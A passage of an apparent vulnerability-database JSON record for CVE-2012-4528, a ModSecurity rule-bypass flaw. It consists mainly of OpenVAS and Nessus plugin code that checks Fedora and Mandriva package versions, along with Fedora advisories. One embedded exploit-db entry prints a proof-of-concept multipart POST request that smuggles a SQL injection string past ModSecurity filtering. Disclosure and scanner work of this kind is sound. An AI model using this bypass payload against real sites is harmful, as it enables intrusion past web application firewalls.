exit(0);\n}\n\nif(release == \"FC17\")\n{\n\n if ((res = isrpmvuln(pkg:\"mod_security\", rpm:\"mod_security~2.7.3~2.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2019-05-29T18:38:17", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-4528", "CVE-2013-2765"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2013-06-07T00:00:00", "id": "OPENVAS:1361412562310865688", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310865688", "type": "openvas", "title": "Fedora Update for mod_security FEDORA-2013-9518", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mod_security FEDORA-2013-9518\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.865688\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-06-07 10:02:43 +0530 (Fri, 07 Jun 2013)\");\n script_cve_id(\"CVE-2013-2765\", \"CVE-2012-4528\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_name(\"Fedora Update for mod_security FEDORA-2013-9518\");\n script_xref(name:\"FEDORA\", value:\"2013-9518\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2013-June/107810.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'mod_security'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC17\");\n script_tag(name:\"affected\", value:\"mod_security on Fedora 17\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC17\")\n{\n\n if ((res = isrpmvuln(pkg:\"mod_security\", rpm:\"mod_security~2.7.3~2.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:37:59", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-4528", "CVE-2013-1915"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2013-04-15T00:00:00", "id": "OPENVAS:1361412562310865552", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310865552", "type": "openvas", "title": "Fedora Update for mod_security FEDORA-2013-4834", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mod_security FEDORA-2013-4834\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.865552\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-04-15 10:09:14 +0530 (Mon, 15 Apr 2013)\");\n script_cve_id(\"CVE-2012-4528\", \"CVE-2013-1915\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for mod_security FEDORA-2013-4834\");\n script_xref(name:\"FEDORA\", value:\"2013-4834\");\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2013-April/101898.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'mod_security'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC17\");\n script_tag(name:\"affected\", value:\"mod_security on Fedora 17\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC17\")\n{\n\n if ((res = isrpmvuln(pkg:\"mod_security\", rpm:\"mod_security~2.7.3~1.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2018-01-08T12:58:08", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-2751", "CVE-2009-5031", "CVE-2012-4528"], "description": "Check for the Version of apache-mod_security", "modified": "2018-01-08T00:00:00", "published": "2012-12-26T00:00:00", "id": "OPENVAS:831759", "href": "http://plugins.openvas.org/nasl.php?oid=831759", "type": "openvas", "title": "Mandriva Update for apache-mod_security MDVSA-2012:182 (apache-mod_security)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for apache-mod_security MDVSA-2012:182 (apache-mod_security)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Multiple vulnerabilities has been discovered and corrected in\n apache-mod_security:\n\n ModSecurity before 2.6.6, when used with PHP, does not properly handle\n single quotes not at the beginning of a request parameter value in\n the Content-Disposition field of a request with a multipart/form-data\n Content-Type header, which allows remote attackers to bypass filtering\n rules and perform other attacks such as cross-site scripting (XSS)\n attacks. NOTE: this vulnerability exists because of an incomplete\n fix for CVE-2009-5031 (CVE-2012-2751).\n \n ModSecurity <= 2.6.8 is vulnerable to multipart/invalid part\n ruleset bypass, this was fixed in 2.7.0 (released on2012-10-16)\n (CVE-2012-4528).\n \n The updated packages have been patched to correct these issues.\";\n\ntag_affected = \"apache-mod_security on Mandriva Linux 2011.0\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://www.mandriva.com/en/support/security/advisories/?name=MDVSA-2012:182\");\n script_id(831759);\n script_version(\"$Revision: 8313 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-08 08:02:11 +0100 (Mon, 08 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-12-26 12:09:31 +0530 (Wed, 26 Dec 2012)\");\n script_cve_id(\"CVE-2009-5031\", \"CVE-2012-2751\", \"CVE-2012-4528\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_xref(name: \"MDVSA\", value: \"2012:182\");\n script_name(\"Mandriva Update for apache-mod_security MDVSA-2012:182 (apache-mod_security)\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of apache-mod_security\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_2011.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"apache-mod_security\", rpm:\"apache-mod_security~2.6.1~1.1~mdv2011.0\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mlogc\", rpm:\"mlogc~2.6.1~1.1~mdv2011.0\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2019-05-29T18:38:44", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-2751", "CVE-2009-5031", "CVE-2012-4528"], "description": "The remote host is missing an update for the ", "modified": "2019-03-12T00:00:00", "published": "2012-12-26T00:00:00", "id": "OPENVAS:1361412562310831759", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310831759", "type": "openvas", "title": "Mandriva Update for apache-mod_security MDVSA-2012:182 (apache-mod_security)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for apache-mod_security MDVSA-2012:182 (apache-mod_security)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://www.mandriva.com/en/support/security/advisories/?name=MDVSA-2012:182\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.831759\");\n script_version(\"$Revision: 14114 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-12 12:48:52 +0100 (Tue, 12 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-12-26 12:09:31 +0530 (Wed, 26 Dec 2012)\");\n script_cve_id(\"CVE-2009-5031\", \"CVE-2012-2751\", \"CVE-2012-4528\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_xref(name:\"MDVSA\", value:\"2012:182\");\n script_name(\"Mandriva Update for apache-mod_security MDVSA-2012:182 (apache-mod_security)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'apache-mod_security'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\", re:\"ssh/login/release=MNDK_2011\\.0\");\n script_tag(name:\"affected\", value:\"apache-mod_security on Mandriva Linux 2011.0\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"Multiple vulnerabilities has been discovered and corrected in\n apache-mod_security:\n\n ModSecurity before 2.6.6, when used with PHP, does not properly handle\n single quotes not at the beginning of a request parameter value in\n the Content-Disposition field of a request with a multipart/form-data\n Content-Type header, which allows remote attackers to bypass filtering\n rules and perform other attacks such as cross-site scripting (XSS)\n attacks. NOTE: this vulnerability exists because of an incomplete\n fix for CVE-2009-5031 (CVE-2012-2751).\n\n ModSecurity <= 2.6.8 is vulnerable to multipart/invalid part\n ruleset bypass, this was fixed in 2.7.0 (released on2012-10-16)\n (CVE-2012-4528).\n\n The updated packages have been patched to correct these issues.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"MNDK_2011.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"apache-mod_security\", rpm:\"apache-mod_security~2.6.1~1.1~mdv2011.0\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mlogc\", rpm:\"mlogc~2.6.1~1.1~mdv2011.0\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "exploitdb": [{"lastseen": "2016-02-04T06:57:56", "description": "ModSecurity POST Parameters Security Bypass Vulnerability. CVE-2012-4528. Remote exploit for linux platform", "published": "2012-10-17T00:00:00", "type": "exploitdb", "title": "ModSecurity POST Parameters Security Bypass Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-4528"], "modified": "2012-10-17T00:00:00", "id": "EDB-ID:37949", "href": "https://www.exploit-db.com/exploits/37949/", "sourceData": "source: http://www.securityfocus.com/bid/56096/info\r\n\r\nModSecurity is prone to a security-bypass vulnerability because it fails to sufficiently sanitize user-supplied input.\r\n\r\nSuccessful exploits can allow attackers to bypass filtering rules; this may aid in further attacks.\r\n\r\nModSecurity 2.6.8 is vulnerable; other versions may also be affected. \r\n\r\nProof of concept:\r\n-----------------\r\n\r\nwut.php:\r\n--------\r\n\r\n<? echo $POST[xxx] ?>\r\n\r\n\r\nPOST request:\r\n-------------\r\n\r\nPOST /wut.php HTTP/1.1\r\nContent-Type: multipart/form-data; boundary=A\r\nContent-Length: 161\r\n\r\n--A\r\nContent-Disposition: form-data; name=\"xxx\"[\\r][\\r][\\n]\r\n--A\r\nContent-Disposition: form-data; name=\"yyy\"; filename=\"z\"\r\n\r\n1 UNION SELECT 1,2,3,4,5,6,7,8,9,10--\r\n\r\n--A--\r\n\r\n\r\nOutput:\r\n-------\r\n\r\n1 UNION SELECT 1,2,3,4,5,6,7,8,9,10--\r\n\r\n(any change in the header should produce a 403)d\r\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/37949/"}], "fedora": [{"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2012-4528"], "description": "ModSecurity is an open source intrusion detection and prevention engine for web applications. It operates embedded into the web server, acting as a powerful umbrella - shielding web applications from attacks. ", "modified": "2012-12-01T08:36:28", "published": "2012-12-01T08:36:28", "id": "FEDORA:F3634200D3", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 17 Update: mod_security-2.7.1-3.fc17", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2012-4528"], "description": "This package provides the base rules for mod_security. ", "modified": "2012-11-23T08:08:01", "published": "2012-11-23T08:08:01", "id": "FEDORA:440B8236F3", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 18 Update: mod_security_crs-2.2.6-3.fc18", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2012-4528"], "description": "ModSecurity is an open source intrusion detection and prevention engine for web applications. It operates embedded into the web server, acting as a powerful umbrella - shielding web applications from attacks. ", "modified": "2012-11-23T08:08:01", "published": "2012-11-23T08:08:01", "id": "FEDORA:4C7B7236F4", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 18 Update: mod_security-2.7.1-3.fc18", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2012-4528"], "description": "This package provides the base rules for mod_security. ", "modified": "2012-12-01T08:36:28", "published": "2012-12-01T08:36:28", "id": "FEDORA:EA9BC200D0", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 17 Update: mod_security_crs-2.2.6-3.fc17", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2012-4528", "CVE-2013-2765"], "description": "ModSecurity is an open source intrusion detection and prevention engine for web applications. It operates embedded into the web server, acting as a powerful umbrella - shielding web applications from attacks. ", "modified": "2013-06-06T01:34:19", "published": "2013-06-06T01:34:19", "id": "FEDORA:D2B39219A9", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 17 Update: mod_security-2.7.3-2.fc17", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2012-4528", "CVE-2013-1915"], "description": "ModSecurity is an open source intrusion detection and prevention engine for web applications. It operates embedded into the web server, acting as a powerful umbrella - shielding web applications from attacks. ", "modified": "2013-04-14T00:26:53", "published": "2013-04-14T00:26:53", "id": "FEDORA:12B0C234C4", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 17 Update: mod_security-2.7.3-1.fc17", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2021-01-07T11:54:02", "description": "A vulnerability has been discovered and corrected in\napache-mod_security :\n\nModSecurity <= 2.6.8 is vulnerable to multipart/invalid part ruleset\nbypass, this was fixed in 2.7.0 (released on2012-10-16)\n(CVE-2012-4528).\n\nThe updated packages have been patched to correct this issue.\n\nNOTE: This advisory was previousely given the MDVSA-2013:016\nidentifier by mistake.", "edition": 24, "published": "2013-04-20T00:00:00", "title": "Mandriva Linux Security Advisory : apache-mod_security (MDVSA-2013:029)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-4528"], "modified": "2013-04-20T00:00:00", "cpe": ["cpe:/o:mandriva:business_server:1", "p-cpe:/a:mandriva:linux:apache-mod_security", "p-cpe:/a:mandriva:linux:mlogc"], "id": "MANDRIVA_MDVSA-2013-029.NASL", "href": "https://www.tenable.com/plugins/nessus/66043", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2013:029. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(66043);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2012-4528\");\n script_xref(name:\"MDVSA\", value:\"2013:029\");\n\n script_name(english:\"Mandriva Linux Security Advisory : apache-mod_security (MDVSA-2013:029)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A vulnerability has been discovered and corrected in\napache-mod_security :\n\nModSecurity <= 2.6.8 is vulnerable to multipart/invalid part ruleset\nbypass, this was fixed in 2.7.0 (released on2012-10-16)\n(CVE-2012-4528).\n\nThe updated packages have been patched to correct this issue.\n\nNOTE: This advisory was previousely given the MDVSA-2013:016\nidentifier by mistake.\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected apache-mod_security and / or mlogc packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_security\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mlogc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/04/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/04/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"apache-mod_security-2.6.3-5.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"mlogc-2.6.3-5.1.mbs1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-01-12T10:10:13", "description": " - Update to 2.7.1\n\n - Update Core rules set to 2.2.6\n\n - Fix build against libxml2 >= 2.9 (upstreamed)\n\n - Add some missing directives RHBZ #569360\n\n - Fix multipart/invalid part ruleset bypass issue\n (CVE-2012-4528) (RHBZ #867424, #867773, #867774)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 13, "published": "2012-11-26T00:00:00", "title": "Fedora 18 : mod_security-2.7.1-3.fc18 / mod_security_crs-2.2.6-3.fc18 (2012-18278)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-4528"], "modified": "2012-11-26T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:18", "p-cpe:/a:fedoraproject:fedora:mod_security", "p-cpe:/a:fedoraproject:fedora:mod_security_crs"], "id": "FEDORA_2012-18278.NASL", "href": "https://www.tenable.com/plugins/nessus/63037", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2012-18278.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(63037);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2012-4528\");\n script_bugtraq_id(56096);\n script_xref(name:\"FEDORA\", value:\"2012-18278\");\n\n script_name(english:\"Fedora 18 : mod_security-2.7.1-3.fc18 / mod_security_crs-2.2.6-3.fc18 (2012-18278)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - Update to 2.7.1\n\n - Update Core rules set to 2.2.6\n\n - Fix build against libxml2 >= 2.9 (upstreamed)\n\n - Add some missing directives RHBZ #569360\n\n - Fix multipart/invalid part ruleset bypass issue\n (CVE-2012-4528) (RHBZ #867424, #867773, #867774)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=867424\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-November/093010.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?01dbaaaf\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-November/093011.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?6a448a98\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected mod_security and / or mod_security_crs packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:mod_security\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:mod_security_crs\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:18\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/11/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/11/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^18([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 18.x\", \"Fedora \" + os_ver);\n\nif 